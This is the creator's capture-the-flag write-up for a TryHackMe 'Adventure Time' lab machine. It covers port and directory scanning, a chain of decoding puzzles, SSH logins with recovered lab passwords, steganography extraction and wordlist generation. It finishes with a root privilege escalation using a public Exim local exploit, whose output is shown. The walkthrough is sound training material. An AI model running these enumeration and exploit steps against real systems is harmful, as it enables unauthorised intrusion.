Adventure Time
Description
A CTF based challenge with a lot of puzzles I created for TryHackMe. It isn’t a real-world challenge, but for the puzzler it’s a nice brainteaser.
This write-up is a guide for those who got stuck along the way.
root@lab:~/THM/AdventureTime# nmap -T4 -sS -sV -sC -p- 192.168.245.132
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 17:10 CEST
Stats: 0:01:28 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 80.00% done; ETC: 17:11 (0:00:22 remaining)
Nmap scan report for 192.168.245.132
Host is up (0.0010s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -r--r--r-- 1 ftp ftp 1401357 Sep 21 14:51 1.jpg
| -r--r--r-- 1 ftp ftp 233977 Sep 21 14:51 2.jpg
| -r--r--r-- 1 ftp ftp 524615 Sep 21 14:51 3.jpg
| -r--r--r-- 1 ftp ftp 771076 Sep 21 14:52 4.jpg
| -r--r--r-- 1 ftp ftp 1644395 Sep 21 14:52 5.jpg
|_-r--r--r-- 1 ftp ftp 40355 Sep 21 14:53 6.jpg
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.245.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 58:d2:86:99:c2:62:2d:95:d0:75:9c:4e:83:b6:1b:ca (RSA)
| 256 db:87:9e:06:43:c7:6e:00:7b:c3:bc:a1:97:dd:5e:83 (ECDSA)
|_ 256 6b:40:84:e6:9c:bc:1c:a8:de:b2:a1:8b:a3:6a:ef:f0 (ED25519)
80/tcp open http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: You found Finn
| ssl-cert: Subject: commonName=adventure-time.com/organizationName=Candy Corporate Inc./stateOrProvinceName=Candy Kingdom/countryName=CK
| Not valid before: 2019-09-20T08:29:36
|_Not valid after: 2020-09-19T08:29:36
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
31337/tcp open Elite?
| fingerprint-strings:
| DNSStatusRequestTCP, RPCCheck, SSLSessionReq:
| Hello Princess Bubblegum. What is the magic word?
| magic word is not
| DNSVersionBindReqTCP:
| Hello Princess Bubblegum. What is the magic word?
| magic word is not
| version
| bind
| GenericLines, NULL:
| Hello Princess Bubblegum. What is the magic word?
| GetRequest:
| Hello Princess Bubblegum. What is the magic word?
| magic word is not GET / HTTP/1.0
| HTTPOptions:
| Hello Princess Bubblegum. What is the magic word?
| magic word is not OPTIONS / HTTP/1.0
| Help:
| Hello Princess Bubblegum. What is the magic word?
| magic word is not HELP
| RTSPRequest:
| Hello Princess Bubblegum. What is the magic word?
| magic word is not OPTIONS / RTSP/1.0
| SIPOptions:
| Hello Princess Bubblegum. What is the magic word?
| magic word is not OPTIONS sip:nm SIP/2.0
| Via: SIP/2.0/TCP nm;branch=foo
| From: <sip:nm@nm>;tag=root
| <sip:nm2@nm2>
| Call-ID: 50000
| CSeq: 42 OPTIONS
| Max-Forwards: 70
| Content-Length: 0
| Contact: <sip:nm@nm>
|_ Accept: application/sdp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.80%I=7%D=9/23%Time=5D88E057%P=x86_64-pc-linux-gnu%r(N
SF:ULL,32,"Hello\x20Princess\x20Bubblegum\.\x20What\x20is\x20the\x20magic\
SF:x20word\?\n")%r(GetRequest,57,"Hello\x20Princess\x20Bubblegum\.\x20What
SF:\x20is\x20the\x20magic\x20word\?\nThe\x20magic\x20word\x20is\x20not\x20
SF:GET\x20/\x20HTTP/1\.0\n")%r(SIPOptions,124,"Hello\x20Princess\x20Bubble
SF:gum\.\x20What\x20is\x20the\x20magic\x20word\?\nThe\x20magic\x20word\x20
SF:is\x20not\x20OPTIONS\x20sip:nm\x20SIP/2\.0\r\nVia:\x20SIP/2\.0/TCP\x20n
SF:m;branch=foo\r\nFrom:\x20<sip:nm@nm>;tag=root\r\nTo:\x20<sip:nm2@nm2>\r
SF:\nCall-ID:\x2050000\r\nCSeq:\x2042\x20OPTIONS\r\nMax-Forwards:\x2070\r\
SF:nContent-Length:\x200\r\nContact:\x20<sip:nm@nm>\r\nAccept:\x20applicat
SF:ion/sdp\n")%r(GenericLines,32,"Hello\x20Princess\x20Bubblegum\.\x20What
SF:\x20is\x20the\x20magic\x20word\?\n")%r(HTTPOptions,5B,"Hello\x20Princes
SF:s\x20Bubblegum\.\x20What\x20is\x20the\x20magic\x20word\?\nThe\x20magic\
SF:x20word\x20is\x20not\x20OPTIONS\x20/\x20HTTP/1\.0\n")%r(RTSPRequest,5B,
SF:"Hello\x20Princess\x20Bubblegum\.\x20What\x20is\x20the\x20magic\x20word
SF:\?\nThe\x20magic\x20word\x20is\x20not\x20OPTIONS\x20/\x20RTSP/1\.0\n")%
SF:r(RPCCheck,75,"Hello\x20Princess\x20Bubblegum\.\x20What\x20is\x20the\x2
SF:0magic\x20word\?\nThe\x20magic\x20word\x20is\x20not\x20\x80\0\0\(r\xfe\
SF:x1d\x13\0\0\0\0\0\0\0\x02\0\x01\x86\xa0\0\x01\x97\|\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\n")%r(DNSVersionBindReqTCP,69,"Hello\x20Princess\x
SF:20Bubblegum\.\x20What\x20is\x20the\x20magic\x20word\?\nThe\x20magic\x20
SF:word\x20is\x20not\x20\0\x1e\0\x06\x01\0\0\x01\0\0\0\0\0\0\x07version\x0
SF:4bind\0\0\x10\0\x03\n")%r(DNSStatusRequestTCP,57,"Hello\x20Princess\x20
SF:Bubblegum\.\x20What\x20is\x20the\x20magic\x20word\?\nThe\x20magic\x20wo
SF:rd\x20is\x20not\x20\0\x0c\0\0\x10\0\0\0\0\0\0\0\0\0\n")%r(Help,4D,"Hell
SF:o\x20Princess\x20Bubblegum\.\x20What\x20is\x20the\x20magic\x20word\?\nT
SF:he\x20magic\x20word\x20is\x20not\x20HELP\n")%r(SSLSessionReq,A1,"Hello\
SF:x20Princess\x20Bubblegum\.\x20What\x20is\x20the\x20magic\x20word\?\nThe
SF:\x20magic\x20word\x20is\x20not\x20\x16\x03\0\0S\x01\0\0O\x03\0\?G\xd7\x
SF:f7\xba,\xee\xea\xb2`~\xf3\0\xfd\x82{\xb9\xd5\x96\xc8w\x9b\xe6\xc4\xdb<=
SF:\xdbo\xef\x10n\0\0\(\0\x16\0\x13\0\n\0f\0\x05\0\x04\0e\0d\0c\0b\0a\0`\0
SF:\x15\0\x12\0\t\0\x14\0\x11\0\x08\0\x06\0\x03\x01\0\n");
MAC Address: 00:50:56:24:A0:1F (VMware)
Service Info: Host: 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 155.02 seconds
oot@lab:~/THM/AdventureTime# gobuster dir -u https://192.168.245.132 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -k -f -s 200 =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: https://192.168.245.132 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt [+] Status codes: 200 [+] User Agent: gobuster/3.0.1 [+] Add Slash: true [+] Timeout: 10s =============================================================== 2019/09/23 17:12:05 Starting gobuster =============================================================== /candybar/ (Status: 200) =============================================================== 2019/09/23 17:12:32 Finished ===============================================================
<!-- KBQWY4DONAQHE53UOJ5CA2LXOQQEQSCBEBZHIZ3JPB2XQ4TQNF2CA5LEM4QHEYLKORUC4=== -->
BASE32 > ROT11
Always check the SSL certificate for clues.
oot@lab:~/THM/AdventureTime# cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 lab 192.168.245.132 adventure-time.com land-of-ooo.com # The following lines are desirable for IPv6 capable hosts ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters
root@lab:~/THM/AdventureTime# gobuster dir -u https://land-of-ooo.com -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -k -f -s 200 =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: https://land-of-ooo.com/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt [+] Status codes: 200 [+] User Agent: gobuster/3.0.1 [+] Add Slash: true [+] Timeout: 10s =============================================================== 2019/09/23 17:20:41 Starting gobuster =============================================================== /yellowdog/ (Status: 200) =============================================================== 2019/09/23 17:21:10 Finished ===============================================================
root@lab:~/THM/AdventureTime# gobuster dir -u https://land-of-ooo.com/yellowdog/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -k -f -s 200 =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: https://land-of-ooo.com/yellowdog/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt [+] Status codes: 200 [+] User Agent: gobuster/3.0.1 [+] Add Slash: true [+] Timeout: 10s =============================================================== 2019/09/23 17:23:17 Starting gobuster =============================================================== /bananastock/ (Status: 200) =============================================================== 2019/09/23 17:23:44 Finished ===============================================================
<!-- _/..../.\_.../._/_./._/_./._/...\._/._./.\_/..../.\_..././.../_/_._.__/_._.__/_._.__ -->
MORSE (fwd slash + bck slash)
THE BANANAS ARE THE BEST!!!
root@lab:~/THM/AdventureTime# gobuster dir -u https://land-of-ooo.com/yellowdog/bananastock/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -k -f -s 200 =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: https://land-of-ooo.com/yellowdog/bananastock/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt [+] Status codes: 200 [+] User Agent: gobuster/3.0.1 [+] Add Slash: true [+] Timeout: 10s =============================================================== 2019/09/23 17:25:54 Starting gobuster =============================================================== /princess/ (Status: 200) =============================================================== 2019/09/23 17:26:25 Finished ===============================================================
<!--
Secrettext = 0008f1a92d287b48dccb5079eac18ad2a0c59c22fbc7827295842f670cdb3cb645de3de794320af132ab341fe0d667a85368d0df5a3b731122ef97299acc3849cc9d8aac8c3acb647483103b5ee44166
Key = my cool password
IV = abcdefghijklmanopqrstuvwxyz
Mode = CBC
Input = hex
Output = raw
-->
AES decrypt
the magic safe is accessibel at port 31337. the magic word is: ricardio
root@lab:~/THM/AdventureTime# nc adventure-time.com 31337 Hello Princess Bubblegum. What is the magic word? ricardio The new username is: apple-guards
root@lab:~/THM/AdventureTime# ssh apple-guards@adventure-time.com
The authenticity of host 'adventure-time.com (192.168.245.132)' can't be established.
ECDSA key fingerprint is SHA256:xbyqQlD2bMFloDbi6VJNgAlut193WbcnAnRm+ZWvRyE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'adventure-time.com,192.168.245.132' (ECDSA) to the list of known hosts.
apple-guards@adventure-time.com's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
1 package can be updated.
0 updates are security updates.
No mail.
Last login: Sat Sep 21 20:51:11 2019 from 192.168.245.129
apple-guards@at:~$
apple-guards@at:~$ cat mbox From marceline@at Fri Sep 20 16:39:54 2019 Return-Path: <marceline@at> X-Original-To: apple-guards@at Delivered-To: apple-guards@at Received: by at.localdomain (Postfix, from userid 1004) id 6737B24261C; Fri, 20 Sep 2019 16:39:54 +0200 (CEST) Subject: Need help??? To: <apple-guards@at> X-Mailer: mail (GNU Mailutils 3.4) Message-Id: <20190920143954.6737B24261C@at.localdomain> Date: Fri, 20 Sep 2019 16:39:54 +0200 (CEST) From: marceline@at Hi there bananaheads!!! I heard Princess B revoked your access to the system. Bummer! But I'll help you guys out.....doesn't cost you a thing.....well almost nothing. I hid a file for you guys. If you get the answer right, you'll get better access. Good luck!!!!
apple-guards@at:~$ find / -user marceline -type f 2>/dev/null /etc/fonts/helper
apple-guards@at:~$ ls -ld /etc/fonts/helper -rwxr-x--- 1 marceline apple-guards 16616 sep 20 17:35 /etc/fonts/helper apple-guards@at:~$ file /etc/fonts/helper /etc/fonts/helper: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, BuildID[sha1]=6cee442f66f3fb132491368c671c1cf91fc28332, for GNU/Linux 3.2.0, not stripped
apple-guards@at:~$ /etc/fonts/helper
======================================
BananaHead Access Pass
created by Marceline
======================================
Hi there bananaheads!!!
So you found my file?
But it won't help you if you can't answer this question correct.
What? I told you guys I would help and that it wouldn't cost you a thing....
Well I lied hahahaha
Ready for the question?
The key to solve this puzzle is gone
And you need the key to get this readable: Gpnhkse
Did you solve the puzzle?
Gpnhkse > vigenere + key = gone > Abadeer
======================================
BananaHead Access Pass
created by Marceline
======================================
Hi there bananaheads!!!
So you found my file?
But it won't help you if you can't answer this question correct.
What? I told you guys I would help and that it wouldn't cost you a thing....
Well I lied hahahaha
Ready for the question?
The key to solve this puzzle is gone
And you need the key to get this readable: Gpnhkse
Did you solve the puzzle? yes
What is the word I'm looking for? Abadeer
That's it!!!! You solved my puzzle
Don't tell princess B I helped you guys!!!
My password is 'My friend Finn'
marceline@at:~$ cat I-got-a-secret.txt Hello Finn, I heard that you pulled a fast one over the banana guards. B was very upset hahahahaha. I also heard you guys are looking for BMO's resetcode. You guys broke him again with those silly games? You know I like you Finn, but I don't want to anger B too much. So I will help you a little bit... But you have to solve my little puzzle. Think you're up for it? Hahahahaha....I know you are. 111111111100100010101011101011111110101111111111011011011011000001101001001011111111111111001010010111100101000000000000101001101111001010010010111111110010100000000000000000000000000000000000000010101111110010101100101000000000000000000000101001101100101001001011111111111111111111001010000000000000000000000000001010111001010000000000000000000000000000000000000000000001010011011001010010010111111111111111111111001010000000000000000000000000000000001010111111001010011011001010010111111111111100101001000000000000101001111110010100110010100100100000000000000000000010101110010100010100000000000000010100000000010101111100101001111001010011001010010000001010010100101011100101001101100101001011100101001010010100110110010101111111111111111111111111111111110010100100100000000000010100010100111110010100000000000000000000000010100111111111111111110010100101111001010000000000000001010
Spoon encoding
The magic word you are looking for is ApplePie
root@lab:~/THM/AdventureTime# nc adventure-time.com 31337 Hello Princess Bubblegum. What is the magic word? ApplePie The password of peppermint-butler is: That Black Magic
marceline@at:~$ su peppermint-butler Password: peppermint-butler@at:/home/marceline$ cd peppermint-butler@at:~$ ls -lah total 116K drwxr-x--- 4 peppermint-butler peppermint-butler 4,0K sep 23 13:56 . drwxr-xr-x 10 root root 4,0K sep 20 20:53 .. -rw-r--r-- 1 peppermint-butler peppermint-butler 220 apr 4 2018 .bash_logout -rw-r--r-- 1 peppermint-butler peppermint-butler 3,7K apr 4 2018 .bashrc -rw------- 1 peppermint-butler peppermint-butler 84K sep 21 11:44 butler-1.jpg drwx------ 2 peppermint-butler peppermint-butler 4,0K sep 20 21:16 .cache -rw-r----- 1 peppermint-butler peppermint-butler 28 sep 22 11:04 flag3 drwx------ 3 peppermint-butler peppermint-butler 4,0K sep 20 21:16 .gnupg -rw-r--r-- 1 peppermint-butler peppermint-butler 807 apr 4 2018 .profile
root@lab:~/THM/AdventureTime# scp peppermint-butler@adventure-time.com:/home/peppermint-butler/butler-1.jpg . peppermint-butler@adventure-time.com's password: butler-1.jpg
root@lab:~/THM/AdventureTime# steghide extract -sf butler-1.jpg Enter passphrase: steghide: could not extract any data with that passphrase!
peppermint-butler@at:~$ find / -user peppermint-butler -type f 2>/dev/null | \grep -v -e '/home\|/proc' | xargs ls -ld -rw-r----- 1 peppermint-butler peppermint-butler 299 sep 21 11:52 /etc/php/zip.txt -rw-r----- 1 peppermint-butler peppermint-butler 300 sep 21 11:50 /usr/share/xml/steg.txt
peppermint-butler@at:~$ find / -user peppermint-butler -type f 2>/dev/null | \grep -v -e '/home\|/proc' | xargs cat I need to keep my secrets safe. There are people in this castle who can't be trusted. Those banana guards are not the smartest of guards. And that Marceline is a friend of princess Bubblegum, but I don't trust her. So I need to keep this safe. The password of my secret file is 'ToKeepASecretSafe'
I need to keep my secrets safe. There are people in this castle who can't be trusted. Those banana guards are not the smartest of guards. And that Marceline is a friend of princess Bubblegum, but I don't trust her. So I need to keep this safe. The password of my secret file is 'ThisIsReallySave'
root@lab:~/THM/AdventureTime# steghide extract -sf butler-1.jpg Enter passphrase: wrote extracted data to "secrets.zip".
root@lab:~/THM/AdventureTime# unzip secrets.zip Archive: secrets.zip [secrets.zip] secrets.txt password: extracting: secrets.txt
root@lab:~/THM/AdventureTime# cat secrets.txt [0200 hours][upper stairs] I was looking for my arch nemesis Peace Master, but instead I saw that cowering little puppet from the Ice King.....gunter. What was he up to, I don't know. But I saw him sneaking in the secret lab of Princess Bubblegum. To be able to see what he was doing I used my spell 'the evil eye' and saw him. He was hacking the secret laptop with something small like a duck of rubber. I had to look closely, but I think I saw him type in something. It was unclear, but it was something like 'The Ice King s????'. The last 4 letters where a blur. Should I tell princess Bubblegum or see how this all plays out? I don't know.......
root@lab:~/THM/AdventureTime# crunch 18 18 -t 'The Ice King s@@@@' > wordlist.txt Crunch will now generate the following amount of data: 8682544 bytes 8 MB 0 GB 0 TB 0 PB Crunch will now generate the following number of lines: 456976
peppermint-butler@at:~$ su gunter Password: gunter@at:~$ id uid=1007(gunter) gid=1007(gunter) groups=1007(gunter),1012(gcc) gunter@at:~$ ss -tupan Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port udp UNCONN 0 0 0.0.0.0:631 0.0.0.0:* udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:* udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:* udp UNCONN 0 0 0.0.0.0:35972 0.0.0.0:* udp UNCONN 0 0 0.0.0.0:5353 0.0.0.0:* udp UNCONN 0 0 [::]:46415 [::]:* udp UNCONN 0 0 [::]:5353 [::]:* tcp LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:* tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:* tcp LISTEN 0 5 127.0.0.1:631 0.0.0.0:* tcp LISTEN 0 20 127.0.0.1:60000 0.0.0.0:* tcp LISTEN 0 25 0.0.0.0:31337 0.0.0.0:* tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:* tcp ESTAB 0 0 192.168.245.132:22 192.168.245.129:52778 tcp LISTEN 0 128 *:80 *:* tcp LISTEN 0 32 *:21 *:* tcp LISTEN 0 128 [::]:22 [::]:* tcp LISTEN 0 5 [::1]:631 [::]:* tcp LISTEN 0 128 *:443 *:*
gunter@at:~$ find / -perm /4000 -type f 2>/dev/null /usr/sbin/pppd /usr/sbin/exim4 /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/xorg/Xorg.wrap /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/bin/chfn /usr/bin/pkexec /usr/bin/chsh /usr/bin/arping /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/passwd /usr/bin/traceroute6.iputils /usr/bin/vmware-user-suid-wrapper /usr/bin/sudo /bin/ping /bin/umount /bin/su /bin/fusermount /bin/mount
Adjust port 25 > port 60000
root@lab:~/THM/AdventureTime# scp exim.sh gunter@adventure-time.com:/home/gunter/ gunter@adventure-time.com's password: exim.sh
gunter@at:~$ bash exim.sh raptor_exim_wiz - "The Return of the WIZard" LPE exploit Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info> Preparing setuid shell helper... Delivering setuid payload... 220 at ESMTP Exim 4.90_1 Ubuntu Mon, 23 Sep 2019 20:12:32 +0200 250 at Hello localhost [127.0.0.1] 250 OK 250 Accepted 354 Enter message, ending with "." on a line by itself 250 OK id=1iCSp6-00015g-FT 221 at closing connection Waiting 5 seconds... -rwsr-xr-x 1 root gunter 8504 sep 23 20:12 /tmp/pwned # id uid=0(root) gid=0(root) groups=0(root),1007(gunter),1012(gcc)
# bash root@at:~# cd /home/bubblegum/ root@at:/home/bubblegum# ls -lah total 120K drwxr-x--- 18 bubblegum bubblegum 4,0K sep 23 13:57 . drwxr-xr-x 10 root root 4,0K sep 20 20:53 .. -rw------- 1 bubblegum bubblegum 725 sep 23 13:57 .bash_history -rw-r--r-- 1 bubblegum bubblegum 220 apr 4 2018 .bash_logout -rw-r--r-- 1 bubblegum bubblegum 3,7K apr 4 2018 .bashrc drwx------ 15 bubblegum bubblegum 4,0K sep 20 17:15 .cache drwx------ 12 bubblegum bubblegum 4,0K sep 20 08:45 .config drwxr-xr-x 2 bubblegum bubblegum 4,0K sep 18 19:39 Desktop drwxr-xr-x 2 bubblegum bubblegum 4,0K sep 18 19:39 Documents drwxr-xr-x 2 bubblegum bubblegum 4,0K sep 18 19:39 Downloads drwx------ 3 bubblegum bubblegum 4,0K sep 18 19:40 .gnupg -rw------- 1 bubblegum bubblegum 3,6K sep 23 13:39 .ICEauthority drwx------ 3 bubblegum bubblegum 4,0K sep 18 19:39 .local drwx------ 5 bubblegum bubblegum 4,0K sep 18 21:20 .mozilla drwxr-xr-x 2 bubblegum bubblegum 4,0K sep 18 19:39 Music -rw------- 1 root root 183 sep 18 21:11 .mysql_history drwxrwxr-x 3 bubblegum bubblegum 4,0K sep 20 19:26 nmap drwxr-xr-x 2 bubblegum bubblegum 4,0K sep 18 19:39 Pictures -rw-r--r-- 1 bubblegum bubblegum 807 apr 4 2018 .profile drwxr-xr-x 2 bubblegum bubblegum 4,0K sep 18 19:39 Public drwxrwxr-x 2 bubblegum bubblegum 4,0K sep 22 10:54 Secrets -rwxrwx--- 1 bubblegum bubblegum 1,6K sep 21 14:41 secretServer.py drwx------ 2 bubblegum bubblegum 4,0K sep 18 19:40 .ssh drwxr-xr-x 2 bubblegum bubblegum 4,0K sep 18 19:39 Templates drwxr-xr-x 2 bubblegum bubblegum 4,0K sep 18 19:39 Videos -rw------- 1 root root 13K sep 23 13:46 .viminfo -rw-rw-r-- 1 bubblegum bubblegum 163 sep 20 19:26 .wget-hsts
root@at:/home/bubblegum# cd Secrets/
root@at:/home/bubblegum/Secrets# ls -lah
total 12K
drwxrwxr-x 2 bubblegum bubblegum 4,0K sep 22 10:54 .
drwxr-x--- 18 bubblegum bubblegum 4,0K sep 23 13:57 ..
-rw-r----- 1 bubblegum bubblegum 3,1K sep 22 10:54 bmo.txt
root@at:/home/bubblegum/Secrets# cat bmo.txt
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
░░░░▄██████████████████████▄░░░░
░░░░█░░░░░░░░░░░░░░░░░░░░░░█░░░░
░░░░█░▄██████████████████▄░█░░░░
░░░░█░█░░░░░░░░░░░░░░░░░░█░█░░░░
░░░░█░█░░░░░░░░░░░░░░░░░░█░█░░░░
░░░░█░█░░█░░░░░░░░░░░░█░░█░█░░░░
░░░░█░█░░░░░▄▄▄▄▄▄▄▄░░░░░█░█░░░░
░░░░█░█░░░░░▀▄░░░░▄▀░░░░░█░█░░░░
░░░░█░█░░░░░░░▀▀▀▀░░░░░░░█░█░░░░
░░░░█░█░░░░░░░░░░░░░░░░░░█░█░░░░
░█▌░█░▀██████████████████▀░█░▐█░
░█░░█░░░░░░░░░░░░░░░░░░░░░░█░░█░
░█░░█░████████████░░░░░██░░█░░█░
░█░░█░░░░░░░░░░░░░░░░░░░░░░█░░█░
░█░░█░░░░░░░░░░░░░░░▄░░░░░░█░░█░
░▀█▄█░░░▐█▌░░░░░░░▄███▄░██░█▄█▀░
░░░▀█░░█████░░░░░░░░░░░░░░░█▀░░░
░░░░█░░░▐█▌░░░░░░░░░▄██▄░░░█░░░░
░░░░█░░░░░░░░░░░░░░▐████▌░░█░░░░
░░░░█░▄▄▄░▄▄▄░░░░░░░▀██▀░░░█░░░░
░░░░█░░░░░░░░░░░░░░░░░░░░░░█░░░░
░░░░▀██████████████████████▀░░░░
░░░░░░░░██░░░░░░░░░░░░██░░░░░░░░
░░░░░░░░██░░░░░░░░░░░░██░░░░░░░░
░░░░░░░░██░░░░░░░░░░░░██░░░░░░░░
░░░░░░░░██░░░░░░░░░░░░██░░░░░░░░
░░░░░░░▐██░░░░░░░░░░░░██▌░░░░░░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
Secret project number: 211243A
Name opbject: BMO
Rol object: Spy
In case of emergency use resetcode: tryhackme{Th1s1s4c0d3F0rBM0}
-------
Good job on getting this code!!!!
You solved all the puzzles and tried harder to the max.
If you liked this CTF, give a shout out to @n0w4n.